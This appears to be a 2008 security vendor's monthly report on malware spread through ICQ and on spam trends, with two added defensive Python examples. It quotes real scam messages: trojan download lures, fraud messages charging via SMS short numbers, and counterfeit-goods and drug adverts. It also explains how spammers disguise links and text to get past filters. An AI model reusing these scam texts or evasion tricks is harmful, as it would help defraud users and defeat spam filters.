Messages that allegedly contain sensational news of an affair between two celebrities with “a report from the scene”. The ‘report’ in this case is usually a link to the following file: http://www.******.com/movie.avi.exe. It is highly likely that this link will lead to Trojan-PSW.Win32.LdPinch.
Messages suggesting that the user download a program which will provide new opportunities e.g., “NEW BUG in ICQ enabling you to create any number that does not exist”. A link in the message will no doubt lead to a program, but that program will steal the user’s UIN rather than create a new account number.
Such messages should simply be ignored.
If a message comes from a user you know, find out whether they really sent it. And of course, do not download a file with an .exe extension and launch it. Even if the file extension is not specified in the link, you could be redirected to another page that contains malicious software.
As always, users should observe the elementary rules of ‘computer hygiene’: an antivirus product with up-to-date databases and a firewall which blocks unauthorized network connections should be installed on the computer. It is a good idea for the antivirus product to include proactive protection that detects malicious programs based on their behavior and/or a heuristic analyzer.
Users are often unaware that a malicious program has been run on their computer. Friends or contacts may provide the first clue that the PC has been infected, for example a friend asking "Why did you ask me to lend you 50 WebMoney units yesterday when we chatted on ICQ?" when the real owner of the ICQ account did no such thing. An even more obvious indication of an infection is a fruitless attempt to log in to a service: failed authorization attempts mean the password has been changed. By whom? Either by the service provider or by a cybercriminal. In the first case the user will receive a new password, or a notice that the password has been changed, by email or some other means. If a cybercriminal is to blame, no such notice arrives.
What should be done if a Trojan has delivered its malicious payload and then deleted itself from the computer? First of all, make sure the computer really is clean by scanning it with an antivirus program. Then change any passwords the Trojan may have stolen, if possible. To do this, try to remember which programs require passwords and try to enter these passwords. If your attempt is successful, change the password immediately. It also makes sense to send the relevant alert to all users on your contact list and ask them not to respond to requests sent from your IM account asking to borrow money, and not to attempt to view photos by following links sent in an IM message.
Installing the latest version of ICQ downloaded from the official ICQ website can help to prevent execution of arbitrary code on the system that is made possible by an ICQ 6.x vulnerability related to processing HTML code.
You can take the following steps to protect yourself from ICQ spam.
Since spammers can check a user’s ICQ status using a website, it makes sense to block this feature in your ICQ client. Spam mailings usually target users who actively chat on ICQ or at least are always online. Therefore, it’s best to remain in invisible mode whenever possible. However, some programs can tell other users whether you are actually offline or just invisible. In this situation, you can use an anti-spam bot – a simple module supported by some IM clients (such as QIP). The screenshot below shows the configuration of a simple anti-spam bot.
Figure 6. Configuration of a simple anti-spam bot
How does an anti-spam bot work? If a user who is not in your contact list wants to chat to you, they will have to answer a question before they can start chatting. They will not be able to send you any messages until the question is answered. It is a good idea to use questions that everyone knows the answers to, such as “how much is 2+2*2?” or “what is the name of our planet?” If the user writes “6” or “Earth” respectively and sends the message, they will then be allowed to send you further messages. This protection is relatively successful at blocking a range of bots that send spam, although some of these bots may be intelligent enough to answer the most popular questions, e.g., the default questions used in protection modules.
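The gate described above can be modelled in a few lines of Python. This is an added example written for this page, not code from QIP or any other IM client; the question bank, the nine-digit UINs in the usage section and the three-attempt lock-out are assumptions of the example. It keeps the behaviour the text describes: a sender who is not on the contact list gets a question instead of delivery, nothing from that sender reaches the inbox until the question is answered, and a correct answer promotes the sender to the contact list.

```python
import hashlib

# Question bank. The article notes that spam bots learn the default questions
# shipped with IM clients, so a real deployment should use its own
# (assumption of this example: three hand-written questions).
QUESTIONS = [
    ("how much is 2+2*2?", "6"),
    ("what is the name of our planet?", "earth"),
    ("how many days are there in a week?", "7"),
]
MAX_ATTEMPTS = 3   # lock-out threshold; this limit is an addition of the example


class AntiSpamBot:
    """Challenge-response gate in front of a user's IM inbox."""

    def __init__(self, contacts):
        self.contacts = set(contacts)   # UINs delivered without a challenge
        self.pending = {}               # uin -> [question index, wrong answers so far]
        self.blocked = set()            # UINs that exhausted their attempts
        self.inbox = []                 # (uin, text) actually shown to the user

    def _question_for(self, uin):
        # Pick the question deterministically per sender so a retry sees the same one.
        digest = hashlib.sha256(uin.encode("utf-8")).hexdigest()
        return int(digest, 16) % len(QUESTIONS)

    def receive(self, uin, text):
        """Process one incoming message; return the automatic reply, or None if none is sent."""
        if uin in self.contacts:
            self.inbox.append((uin, text))
            return None
        if uin in self.blocked:
            return None                 # dropped silently
        if uin not in self.pending:
            idx = self._question_for(uin)
            self.pending[uin] = [idx, 0]
            # The first message itself is withheld; only the challenge goes back.
            return "Please answer this question to start chatting: " + QUESTIONS[idx][0]
        idx, wrong = self.pending[uin]
        if text.strip().lower() == QUESTIONS[idx][1]:
            del self.pending[uin]
            self.contacts.add(uin)
            return "Thanks, you can now send messages."
        wrong += 1
        if wrong >= MAX_ATTEMPTS:
            del self.pending[uin]
            self.blocked.add(uin)
            return None
        self.pending[uin] = [idx, wrong]
        return "Wrong answer. " + QUESTIONS[idx][0]


if __name__ == "__main__":
    bot = AntiSpamBot(contacts=["111111111"])
    print(bot.receive("111111111", "hi"))                          # None: delivered
    print(bot.receive("222222222", "lend me 50 WebMoney units"))   # challenge sent back
```

The lock-out is there because a bot that guesses at the popular default questions gets unlimited tries otherwise; note that it does nothing against the case the text goes on to describe, a hijacked account that is already on your contact list.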
Conclusion
Instant messaging programs are very attractive to malicious users of all kinds, and because of this the problem of malware distribution via IM clients is serious. New versions of IM clients contain as yet unknown vulnerabilities, which can be identified first by hackers and only afterwards by program developers. Such situations can easily lead to mass epidemics. Some users are also extremely tired of getting unwanted messages (IM spam).
Currently, there are no methods or solutions designed specifically to protect IM clients. However, observing the simple rules of ‘computer hygiene’, and using a well-configured anti-spam bot combined with a healthy dose of common sense can help users enjoy worry-free chat via the Internet.
Evolution of spam
Spam in mail traffic
Spam in mail traffic averaged 86.2% in April 2008. A low of 68.6% was recorded on 28 April, while a high of 93.9% occurred on 9 April. The share of graphical spam declined considerably in April compared to March and was only 13%.
Spam by category
In April the top five leading spam categories remained unchanged from the previous month:
Medications, health-related goods and services (16.4%)
Education (15.6%)
Fake designer watches (11.6%)
Travel and tourism (9.8%)
Computers and the Internet (4.3%)
The Medications, health-related goods and services category maintained its leading position. The lion's share of spam in this category is English-language adverts for viagra, which sells so well because spammers offer it without a prescription (viagra is a prescription-only drug in a number of countries). In Russia, however, viagra is freely available at any drug store, so Russian-language adverts for it are rare.
It was therefore interesting to see Russian-language spam advertising viagra appear in April. The text was translated from an English-language version. The site the spammers advertised carried the caveat "Generic viagra for sale here" and continued: "exact copy of the world's most famous medication for male erectile dysfunction". Since Russian consumers are really only attracted by low prices, the mailing was short-lived.
The problem of boosting potency has recently become particularly acute not only for men over 60 but also for men in their 40s and 30s. According to World Health Organization data, one in ten men over 21 suffers from reduced potency, and one in three men over 60 is incapable of intercourse. Reduced potency can be treated! The world-famous drug Viagra will help you. Unlike other methods of treating erectile dysfunction, which involve injections into the penis or other medical procedures, Viagra is a simple, convenient and easy-to-use drug. When using Viagra you simply take one tablet when you are planning sexual contact. The advantages of Viagra: - Effective in 91% of men, unlike analogues such as Sealex, Impaza, Vuka-Vuka - Works for 6 hours after it is taken - Acts on the natural mechanisms of erection - Used by men suffering from erectile dysfunction of various origins (vascular and nervous erection disorders) - Taken immediately before intercourse - Has practically no side effects. You can buy this drug here
A Russian-language advert for viagra, translated. In the original, the body of the text is interspersed with full stops that break up individual words (the opening words read "П.робл.е.ма. п.овышения потенци.и").
As the school year drew to an end, spammers actively exploited the theme of school-leaving exams and higher education entrance exams, keeping the Education category in second place. Another popular theme was the option of avoiding entrance exams altogether.
You have a month and a half left to enrol in distance learning WITHOUT the Unified State Exam (EGE)!
According to Russian legislation, the results of school-leaving exams are only valid for a year. Entering a higher educational institution after that period means the exams have to be passed once again. The advert above offers a way of avoiding repeat exams: a certificate with the required pass results can be obtained by simply signing up for a distance-learning course and paying a “fee”. Those interested in the offer are told to hurry and apply before June 10, 2008, and also to tell their friends.
Spam messages offering fake designer goods remained in third place. The sale of replica goods also took on an unexpected “political” slant. In the run up to the inauguration of Russia’s new president, spam messages started offering “A watch like Putin’s”. A cheap copy of the outgoing president’s chronometer was not the only thing on offer: lots of other goods of a similar “quality” were also available.
A watch like Putin’s The legendary Patek Philippe watch of V.V. Putin!!! For just 325 euros (replica)! You want to look like the President, but don’t want to pay 50000 euros?
Now it’s possible, and the replica is no different from the original in terms of both quality and looks. Compare for yourself:
Patek Philippe Perpetual Calendar watch (the watch of V.V. Putin)
Made in: original – Switzerland, replica - Belgium
Cost: original – 53000 euros, replica – 325 euros.
Mechanism: original – Switzerland, replica – Switzerland.
Service life: original – 10 years, replica – 6 years.
Guarantee: original – 24 months, replica – 18 months.
Convenient purchase: original – 2 boutiques in Moscow, Russia. Replica – free delivery to any town in Russia (CIS).
External appearance: replica is 100% identical to the original!
See here {LINK}
Tel. 8-800-2000-720 (free calls from Russia).
There are also more than 189 watches of famous international brands at the Internet store {LINK}
Rado (from 299 euros), Rolex (from 325 euros), Omega (from 242 euros), Vacheron Constantin (up to 1749 euros), Breguet (from 449 euros), Cartier (from 229 euros)!
юмфм фдтхю вг фла ц аа дбцяа щгд
эвх дажжд гюбч тцмяг
ыу црфщи жеюпу г шж б рояшь ц
ияфп зш э новкп
сюшшо м бшв р угещь
ьвл тгжну зштив хвцвл
у лош дфвыя прв илл
The lines of random letters at the end of the message are filler that varies from copy to copy of the mailing; its purpose is to defeat filters that match on the text of the message.
SMS fraud
More and more spam with offers to pay for goods and services via SMS messages sent to short numbers is appearing on the Russian Internet. Even if the spam message states that the SMS is free of charge, it doesn’t mean it actually is. There is also no guarantee that the user will get what he wanted and that his money won’t just end up lining the pocket of a cybercriminal.
Spammers continue to use Mail.ru logos to make their messages look more respectable. The message below deliberately promotes a dating service because it entails further communication and new contacts. These types of messages usually include an attractive photo, and only mention further down the page that you have to pay to communicate. The very fact that the service is not free should arouse suspicion.
Znakomstva@mail.ru
You have a message on the Mail.ru mobile portal from user <Viktoria SexyGirl>
To read the message, send an SMS with the text tt456734 to 4449 (the service is available to residents of the Russian Federation and citizens of the CIS; the charge is $0.3 plus VAT)
The message was sent on 26 April 2008
Thank you for being a Mail.Ru user.
Regards, the Mail.Ru administration (1518450363)
Today, even the financial pyramid schemes that used to promise huge online earnings only send out their information after receiving an SMS. For the cost of an outgoing message (5 rubles, or about 20 cents) the user contributes to a multi-level marketing (MLM) business. It goes without saying that a spammer who promises the recipient "earnings" with no initial investment can hardly be trusted.
This is worth seeing
Send an SMS to 7030 with the text код+25558. Sending the message costs 5 rubles. In return you will get a link to a site with earnings, with no investment and practically no involvement on your part.
Solutions from spammers: protecting against viruses and spam
On the eve of the 30th anniversary marking the first spam message sent via email, users were being offered equipment not only for sending spam but also to protect against it.
Sympathetic-sounding mass mailings with the theme “Tired of spam? Call us!!!” promoted nothing other than anti-spam and antivirus products from the German company Avira. It is unclear whether this was just another case of black PR, or the Russian representatives of Avira using unorthodox methods to advertise the services of Avira’s dealers in Russia.
In April, Russian-language spam promoting anti-virus products added to the usual English-language advertisements for very cheap software. The main difference was that the Russian-language spam was offering the programs for free.
Users should be particularly careful when downloading “antivirus” files from unknown sources, because they may turn out to be malicious programs.
Kaspersky Key 5 6 7
Kaspersky 5 key, valid until 9_03_2010, free
Kaspersky 6 key, valid until 11_03_2010, free
Kaspersky 7 key, free
especially for ХХХХХХХХХХХХХХ
at {site}
(The original message repeated the same text in Russian and in transliterated Russian.)
Spammers have long offered an 'unsubscribe' option in their mailings; the latest trick is unsubscribing by telephone. This is hardly likely to eradicate spam and if anything will ensure it continues: by phoning, the user merely confirms that the email address is active and ensures that it stays in the spammers' databases.
We help you to launch your business
Legal company “Consultant” offers the following types of legal services:
Registration of LLC, CJSC, OJSC
Registration of individual business
Registration of equity issue
Legal addresses
Registration of non-commercial organizations
Amendments to constitutive documents
Copies of extracts from the Uniform State Register of Enterprises and Organizations
Consultation on stockholder rights
On demand drafts of constitutive documents
Holding of stockholder meetings
Corporate disputes
Major transaction support
Legal entity dissolution
Bookkeeping assistance
Drafting and expertise of all types of civil documents
Special offer: preparation of documents to be presented in internal revenue service – 1500 rub.
Discount for complex order!
Contact information (495) 951-32-05 783-72-66
If you opened this e-mail, you may need legal advice. If you opened this e-mail by chance and you do not need any legal assistance, please, delete this message. You can unsubscribe from mass mailings by calling 951-32-05 and stating your e-mail address.
Spammer methods and tricks
In order to bypass filtering systems, spammers are willing to modify texts to such an extent that they become unreadable. The flow of spam in April was marked by a wave of messages containing heavily disguised telephone numbers: the digits are interspersed with letters, which change from message to message (the number in the example below has been masked). This method did not gain popularity, however, because only those really interested in the topic would be patient enough to work out the exact telephone number. By the end of the month the technique had already disappeared from the flow of spam.
English.
Lessons with methodologist
You can even think in English (if you really make an effort) Understand grammar. No need to think you’re a hopeless case! Start learning. A teacher can come to you. One academic hour costs $90 (45 minutes) You can get a free consultation.
(495) xxx-xx-xx
Another new obfuscation method replaces random letters in links with percent-encoded character codes (the %XX notation used in URLs, which the original report calls UTF codes; %73 is 's' and %78 is 'x'). Spammers encode different letters of the same link in each individual message. A filter that matches on the raw message text rather than on the decoded link does not recognize the link, and therefore does not recognize that the messages belong to the same mass mailing. The mail client decodes the link before displaying it, so the user never notices any change.
How the original message looks
Summer is coming and it will soon be time to head to the beach.
It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://e%73g%78uvj.info
The message that the recipient sees
Summer is coming and it will soon be time to head to the beach.
It’s the perfect time to lose those extra kilos. How are you going to do it? I, personally, am not going to go on a diet or start exercising. There is an easier and quicker method for lazy people like you and me. Check out this site for information and photos http://esgxuvj.info/
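Both of the tricks shown in this section, the percent-encoded link here and the full stops pushed into words in the viagra advert earlier, are cheap to undo on the receiving side before signature matching: decode the %XX escapes in every link, rejoin the split words, and fingerprint the result so that copies of one mailing collide. The Python below is an added example written for this page, not part of the original report or of any filtering product. The three sample messages are constructed; MSG_A carries the encoded link quoted above, MSG_B is another copy of the same mailing with different letters encoded and dotted words, and MSG_C belongs to a different mailing.

```python
import hashlib
import re
from urllib.parse import unquote, urlsplit, urlunsplit

# Sample messages constructed for this example. MSG_A carries the
# percent-encoded link quoted in the report (%73 = 's', %78 = 'x'); MSG_B is
# another copy of the same mailing with different letters encoded and full
# stops pushed into words; MSG_C belongs to a different mailing.
MSG_A = ("Summer is coming and it will soon be time to head to the beach. "
         "Check out this site for information and photos http://e%73g%78uvj.info")
MSG_B = ("Su.mmer is com.ing and it wi.ll soon be ti.me to he.ad to the beach. "
         "Che.ck out this si.te for inf.ormation and photos http://%65sgxu%76j.info/")
MSG_C = ("Summer is coming and it will soon be time to head to the beach. "
         "Check out this site for information and photos http://another.example/")

URL_RE = re.compile(r'https?://[^\s<>"\']+', re.IGNORECASE)


def canonical_url(url):
    """Decode %XX escapes in host and path, lowercase, and normalise an empty path."""
    url = url.rstrip(".,;:)")                 # punctuation that trailed the link in prose
    parts = urlsplit(url)
    host = unquote(parts.netloc).lower().rstrip(".")
    path = unquote(parts.path) or "/"
    return urlunsplit((parts.scheme.lower(), host, path, parts.query, ""))


def normalize_text(text):
    """Strip links, rejoin words split by full stops, drop punctuation, lowercase."""
    text = URL_RE.sub(" ", text)
    text = re.sub(r"(?<=\w)\.+(?=\w)", "", text)  # Su.mmer -> Summer, по..лько -> только
    text = re.sub(r"[^\w\s]+", " ", text)         # remaining punctuation becomes a separator
    return " ".join(text.lower().split())


def fingerprint(message):
    """Key under which copies of one mailing collide: canonical links plus a text digest."""
    urls = tuple(sorted({canonical_url(u) for u in URL_RE.findall(message)}))
    digest = hashlib.sha256(normalize_text(message).encode("utf-8")).hexdigest()[:16]
    return (urls, digest)


def group_by_mailing(messages):
    """Map each fingerprint to the indices of the messages that share it."""
    groups = {}
    for i, msg in enumerate(messages):
        groups.setdefault(fingerprint(msg), []).append(i)
    return groups


if __name__ == "__main__":
    for key, members in group_by_mailing([MSG_A, MSG_B, MSG_C]).items():
        print(key[0], "->", members)
```

The digest is computed over the normalized text and the links are kept separately, so two messages with identical wording but different destinations (MSG_A and MSG_C) still land in different groups; the random-letter filler seen in the watch advert earlier is not handled here and needs a fuzzier comparison.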
Russian-language mailings advertising sites in the .tk domain zone, which belongs to Tokelau, have resumed. Spammers use this free registration zone to create a large number of duplicate pages, thus increasing the chances of evading anti-spam systems.
there is no more love for you. It died, your love. And instead you have been given salt works, and along the banks of dark, deep rivers, for the most part http://KNEWMYNAME.TK
People came from the capitals and other parts to look at our marvels, and wanted to get into the black hole that was staring him right between the eyes. The hammer clicked dryly, then http://KIRKUSH.TK
Two links that lead to the same Russian-language site selling DVDs of popular films which have been re-dubbed with humorous voiceovers.
April once again saw spammers sending pictures that contained text positioned at various angles (see below), which was meant to prevent such images from being detected.
In a variation of this technique, spammers also sent several mass mailings containing pictures with handwritten text in an attempt to bypass spam detectors.
An image with a handwritten message offering an SMS message service that allows the sender’s number to be masked, making the message look as though it is from another number.
In the first instance it is easy to read the text of the message, though the second picture may pose problems not only for spam filters but also those not used to reading handwriting.
Conclusion
With the approach of the summer holiday season, the amount of spam in mail traffic is declining, and the trend looks set to continue into the summer. However, the fact that spammers are continuing to search for new technologies that bypass anti-spam filters suggests that this is only a seasonal decline. Moreover, the criminal element in spam is becoming more prevalent, which in turn attracts those who want to profit illegally and further contributes to the criminalization of spam. Unfortunately, a 'ceasefire' or 'capitulation' by spammers in the war on spam is highly unlikely.
Recent trends
The amount of spam in mail traffic fell compared to March’s (http://www.viruslist.com/en/analysis?pubid=204792004) figure and averaged 86.2%.
0.76% of messages contained malicious files and links to infected web sites.
1.3% of messages contained links to phishing sites.
The amount of spam containing graphical attachments fell considerably compared to March’s figure and accounted for just 13% of spam.
The amount of unsolicited mass mailings containing offers to pay for services via SMS messages increased.
Spammers used special codes to mask messages.
Spam containing links to advertising sites in the .tk domain zone resumed.
Top 20 Viruses for April 2008
Position Change in position Name Proactive Detection Flag Percentage
1. 0 Email-Worm.Win32.NetSky.q Trojan.generic 40.58
2. +1 Email-Worm.Win32.NetSky.d Trojan.generic 8.18
3. +6 Email-Worm.Win32.NetSky.y Trojan.generic 7.62
4. +3 Email-Worm.Win32.Bagle.gt Trojan.generic 6.64
5. +1 Email-Worm.Win32.Scano.gen Trojan.generic 6.47
6. +2 Email-Worm.Win32.NetSky.aa Trojan.generic 5.81
7. New! Trojan-Downloader.Win32.Agent.ica downloader 3.08
8. -5 Email-Worm.Win32.Nyxem.e Trojan.generic 3.01
9. New! Net-Worm.Win32.Mytob.x Worm.P2P.generic 2.94
10. New! Net-Worm.Win32.Mytob.r Worm.P2P.generic 2.68
11. -1 Email-Worm.Win32.Bagle.gen Trojan.generic 1.73
12. +3 Email-Worm.Win32.Scano.bn Trojan.generic 1.19
13. -2 Email-Worm.Win32.Mydoom.l Worm.P2P.generic 1.07
14. New! Net-Worm.Win32.Mytob.bk Worm.P2P.generic 0.91
15. -13 Email-Worm.Win32.Mydoom.m Trojan.generic 0.89
16. +1 Email-Worm.Win32.NetSky.c Trojan.generic 0.70
17. Return Net-Worm.Win32.Mytob.c Trojan.generic 0.69
18. 0 Email-Worm.Win32.NetSky.t Trojan.generic 0.62
19. New! Email-Worm.Win32.Bagle.dx Trojan.generic 0.47
20. New! Email-Worm.Win32.NetSky.ac Trojan.generic 0.47
Other Malicious Programs 4.06
In April 2008, malicious code in mail traffic underwent significant changes compared to the previous month. Net-Worm.Win32.Mytob.t and Email-Worm.Win32.Mydoom.m, which had pushed their way towards the top by jumping ten places last month, suddenly appeared to run out of steam: one slid back down the rankings, while the other dropped off the bottom of the table altogether. At the same time, new malicious programs appeared in the Top Twenty, something which did not happen in March.
The most recent mass mailing of the Diehard Trojan took place in February, and it seems that the authors are taking a break from spreading their creation widely. Our suppositions in March that this Trojan might end up lying low, rather than actively attacking, seem to be borne out by the absence of the program from this month's Top Twenty.
Once again, it's worms that have been around for some time which are out in full strength, with a range of modifications of Email-Worm.Win32.Netsky taking up seven out of twenty places in the rankings. This could be seen as a certain measure of success for the virus writers, especially if you consider that these modifications made up almost 64% of all infected mail traffic in April.
Trojan-Downloader.Win32.Small.hsl, which appeared in February and which rose to fifth place, has disappeared, being replaced by Trojan-Downloader.Win32.Agent.ica. However, the displacement of one Trojan-Downloader program by another is mere coincidence: the two programs have nothing in common, being constructed in completely different ways and created using different versions of Microsoft Visual Studio.
Neither Zhelatin (a.k.a. the Storm Worm) nor Warezov, which vanished from the rankings in February, have returned. It seems their authors may have decided against spreading their creations by using email attachments.
Overall, the picture created by the April 2008 statistics once again confirms the fact that new malicious programs are not being sent as attachments to emails. This tried and tested method, which is very resource intensive (at least when carrying out the initial mass mailing) is mainly used by the veteran malicious programs – those with email worm functionality. It's only rarely that we see Trojan-Downloader programs that put in a brief appearance in the Top Twenty; this is probably the result of mass mailings being conducted by malicious users who are new to the scene.
Overall, malicious programs made up 0.95% of all mail traffic scanned by Kaspersky Lab systems in April 2008. The 'Other malicious programs' category accounted for 4.06% of all malicious code found in mail traffic, indicating that a number of other worms and Trojans are in active circulation.
The Top Twenty countries which acted as sources of infected emails in April are shown below:
Position Change Country Percentage
1 0 the US 18.50
2 +2 Korea, Republic of 9.99
3 +4 Spain 8.12
4 -2 China 5.30
5 +7 Poland 5.11
6 +3 France 4.99
7 +1 Brazil 4.28
8 -2 Germany 3.98
9 -4 UK 3.47
10 0 Italy 3.05
11 New! Israel 2.31
12 -9 India 2.25
13 -2 Japan 2.07
14 New! Argentina 1.63
15 0 Turkey 1.36
16 -2 Australia 1.16
17 +2 Netherlands 1.14
18 New! Romania 1.11
19 -2 Canada 1.06
20 -7 Russia 0.97
Other countries 18.15
Summary:
Went up: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Scano.bn, Email-Worm.Win32.NetSky.c
Went down: Email-Worm.Win32.Nyxem.e, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.Mydoom.m
Re-entry: Net-Worm.Win32.Mytob.c
No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.NetSky.t
Saturday, June 7, 2008